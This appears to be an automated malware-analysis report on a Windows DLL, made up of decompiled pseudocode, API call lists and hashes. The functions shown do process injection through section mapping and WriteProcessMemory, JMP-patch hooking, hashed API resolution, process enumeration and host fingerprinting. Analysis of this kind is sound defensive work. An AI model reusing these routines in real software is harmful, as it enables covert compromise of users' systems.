0x1000d0a3
0x1000d0a8
0x1000d0ae
0x1000d0b7
0x1000d0c5
0x1000d0cc
0x1000d0d1
0x1000d0d1
0x1000d0d2
0x1000d0b9
0x1000d0b9
0x1000d0b9
0x1000d0d8
0x1000d0de
0x1000d0e3
0x1000d0e9
0x1000d0f1
0x1000d0fb
0x1000d108
0x1000d113
0x1000d11b
0x1000d13c
0x1000d13e
0x1000d13e
0x1000d140
0x1000d14a
0x1000d156
0x1000d166
0x1000d16c
0x1000d172
0x1000d174
0x1000d185
0x1000d18b
0x1000d191
0x1000d196
0x1000d19c
0x1000d1a2
0x1000d1a7
0x1000d1ac
0x1000d1ac
0x1000d1b2
0x1000d1b2
0x1000d1bb
0x1000d1c7
0x1000d1cf
0x1000d1d3
0x1000d1d3
0x1000d1cf
0x1000d1d7
0x1000d1dd
0x1000d1e3
0x1000d1ea
0x1000d1fb
0x1000d201
0x1000d209
0x1000d210
0x1000d212
0x1000d223
0x1000d229
0x1000d22e
0x1000d231
0x1000d234
0x1000d23a
0x1000d240
0x1000d242
0x1000d248
0x1000d251
0x1000d254
0x1000d254
0x1000d257
0x1000d25f
0x1000d26a
0x1000d270
0x1000d261
0x1000d263
0x1000d263
0x1000d279
0x1000d279
0x1000d27f
0x1000d287
0x1000d292
0x1000d297
0x1000d29d
0x1000d29f
0x1000d2ac
0x1000d2ad
0x1000d2ae
0x1000d2b9
0x1000d2bb
0x1000d2c2
0x1000d2c2
0x1000d2cc
0x1000d2d1
0x1000d2d6
0x1000d2d6
0x1000d2dc
0x1000d2e3
0x1000d2e4
0x1000d2f1
0x1000d304
0x1000d309
0x1000d30e
0x1000d317
0x1000d317
0x1000d31d
0x1000d322
0x1000d328
0x1000d32e
0x1000d333
0x1000d33c
0x1000d33e
0x1000d345
0x1000d345
0x1000d34b
0x1000d353
0x1000d358
0x1000d359
0x1000d35e
0x1000d367
0x1000d369
0x1000d374
0x1000d374
0x1000d37d
0x1000d385
0x1000d38c
0x1000d391
0x1000d3a0
0x1000d3b8
0x1000d3bf
0x1000d3cd
0x1000d3df
0x1000d3e6
0x1000d3ee
0x1000d3f3
0x00000000

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetCurrentProcessId.KERNEL32 ref: 1000D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
GetCurrentProcess.KERNEL32 ref: 1000D09F
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
GetLastError.KERNEL32 ref: 1000D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
GetLastError.KERNEL32 ref: 1000D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
GetCurrentProcess.KERNEL32 ref: 1000D20E

Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06

memset.MSVCRT ref: 1000D229
GetVersionExA.KERNEL32(00000000), ref: 1000D234
GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
GetSystemInfo.KERNEL32(?), ref: 1000D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287

Strings

SystemDrive, xrefs: 1000D353, 1000D35E, 1000D373
TEMP, xrefs: 1000D328, 1000D333, 1000D344
USERPROFILE, xrefs: 1000D2E4, 1000D312
TEMP, xrefs: 1000D2F3
%s\%s, xrefs: 1000D2F9

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1475707489-2706916422
Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x2da0590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x2e1fbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x2da0590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

0x1000c6c6
0x1000c6cd
0x1000c6cf
0x1000c6d1
0x1000c6d3
0x1000c6d6
0x1000c6d9
0x1000c6dc
0x1000c6df
0x1000c6e2
0x1000c6e5
0x1000c6ef
0x1000c6f2
0x1000c6f9
0x1000c6fe
0x1000c6fe
0x1000c704
0x1000c706
0x1000c70f
0x1000c8b5
0x1000c8b9
0x1000c8be
0x1000c8c4
0x1000c8c7
0x1000c8c7
0x1000c8cb
0x1000c8d0
0x1000c8e2
0x1000c8e2
0x1000c8eb
0x1000c8f5
0x1000c8f5
0x1000c8fc
0x1000c8fc
0x1000c71e
0x1000c738
0x00000000
0x00000000
0x1000c743
0x1000c74d
0x1000c757
0x1000c75a
0x1000c760
0x1000c767
0x1000c768
0x1000c769
0x1000c772
0x1000c773
0x1000c774
0x1000c776
0x1000c779
0x1000c77c
0x1000c77f
0x1000c782
0x1000c78e
0x1000c7b0
0x1000c7b8
0x1000c7bb
0x1000c7c6
0x1000c7c6
0x1000c7b8
0x1000c7f1
0x1000c8b2
0x00000000
0x1000c7f7
0x1000c803
0x1000c818
0x00000000
0x00000000
0x1000c82e
0x1000c830
0x1000c837
0x00000000
0x00000000
0x1000c848
0x1000c85f
0x1000c86f
0x1000c87b
0x1000c880
0x1000c886
0x1000c896
0x1000c8a2
0x1000c8aa
0x00000000
0x1000c8aa

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
RegisterClassExA.USER32 ref: 1000C785
CreateWindowExA.USER32 ref: 1000C7B0
DestroyWindow.USER32 ref: 1000C7BB
UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
NtClose.NTDLL(00000000), ref: 1000C8F5

Strings

sadccdcdsasa, xrefs: 1000C73E
0, xrefs: 1000C74D
cdcdwqwqwq, xrefs: 1000C76A

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}

0x10005f82
0x10005f92
0x10005f9c
0x100060d0
0x100060c3
0x00000000
0x100060c5
0x100060d7
0x10006098
0x00000000
0x10006098
0x10005fa2
0x10005faa
0x10005fb1
0x10005fb3
0x00000000
0x10005fc6
0x10005fc6
0x10005fcc
0x10005fd2
0x10005fe2
0x10005fe7
0x10005fef
0x10005ff7
0x10006013
0x10006018
0x1000601b
0x1000601d
0x1000601f
0x1000602c
0x10006035
0x1000603e
0x10006043
0x10006044
0x10006052
0x1000605c
0x1000606d
0x10006072
0x10006079
0x10006080
0x10006083
0x1000608f
0x10006090
0x1000609c
0x100060a5
0x100060b7
0x100060ba
0x100060c1
0x00000000
0x00000000
0x00000000
0x100060c1
0x10006092
0x10006097
0x00000000
0x10005ff7

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
SetLastError.KERNEL32(000000AA), ref: 100060D7

Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
GetLastError.KERNEL32 ref: 10005FEF
memset.MSVCRT ref: 10006013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
GetFileAttributesW.KERNEL32(00000000), ref: 10006083
CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7

Strings

Hello qqq, xrefs: 10005F8D

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 3435743081-3610097158
Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105
nativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x2e1faa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x2e1faa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

0x1000cb83
0x1000cb85
0x1000cb87
0x1000cb90
0x1000cb9b
0x1000cba0
0x1000cba4
0x1000cbb8
0x1000cbc0
0x1000cbd0
0x1000cbd1
0x1000cbd6
0x1000cbe1
0x1000cbe7
0x1000cbef
0x1000cbfd
0x1000cc03
0x1000cc04
0x1000cc10
0x1000cc17
0x1000cc27
0x1000cc67
0x1000cc67
0x1000cc46
0x1000cc46
0x1000cc65
0x00000000
0x00000000
0x1000cc65
0x1000cc27
0x1000cbe1
0x1000cba4
0x1000cc69
0x1000cc70
0x1000cc73
0x1000cc79
0x1000cc79
0x1000cc80
0x1000cc87
0x1000cc8a
0x1000cc8f
0x1000cc9c
0x1000cca2
0x1000cca9

APIs

Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6

memset.MSVCRT ref: 1000CBB8
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
String ID:
API String ID: 317994034-0
Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x2e1faa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x2e1faa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

0x1000aba3
0x1000abbb
0x1000abbd
0x1000abc0
0x1000abc2
0x1000abc7
0x1000abd6
0x1000abde
0x1000abf2
0x1000ac02
0x1000ac08
0x1000ac0d
0x1000ac13
0x00000000
0x00000000
0x1000ac15
0x1000ac26
0x00000000
0x00000000
0x00000000
0x1000ac26
0x1000ac2e
0x1000ac35
0x1000abf4
0x1000abf4
0x1000abfa
0x1000abff
0x1000abff
0x1000abf2
0x1000ac3e

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
memset.MSVCRT ref: 1000ABD6
Process32First.KERNEL32(00000000,?), ref: 1000ABED
Process32Next.KERNEL32(00000000,?), ref: 1000AC21
CloseHandle.KERNEL32(00000000), ref: 1000AC2E

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x1000dfb6
0x1000dfb8
0x1000dfbb
0x1000dfbe
0x1000dfc4
0x1000e021
0x00000000
0x1000e021
0x1000dfc6
0x1000dfd1
0x1000dfd4
0x1000dfd9
0x1000dfde
0x1000dfe1
0x1000dfe3
0x1000dfe6
0x1000dfe9
0x1000dfee
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dff0
0x1000dff0
0x1000e002
0x1000e00f
0x1000e013
0x00000000
0x00000000
0x1000e015
0x1000e018
0x1000e019
0x1000e01f
0x00000000
0x00000000
0x00000000
0x1000e01f
0x1000e036
0x1000e03b
0x1000e03f
0x00000000
0x1000e04b
0x1000e04b
0x1000e04d
0x1000e04d
0x1000e053
0x00000000
0x00000000
0x1000e059
0x1000e05d
0x1000e061
0x00000000
0x00000000
0x00000000
0x1000e061
0x1000e067
0x1000e06f
0x1000e074
0x1000e077
0x1000e077
0x1000e079
0x1000e07d
0x1000e085
0x00000000
0x00000000
0x1000e089
0x1000e091
0x00000000
0x00000000
0x00000000
0x1000e091

APIs

LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089

Strings

.dll, xrefs: 1000E079, 1000E07C

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}

0x1000b7a8
0x1000b7b1
0x1000b7bd
0x1000b7c3
0x1000b7c5
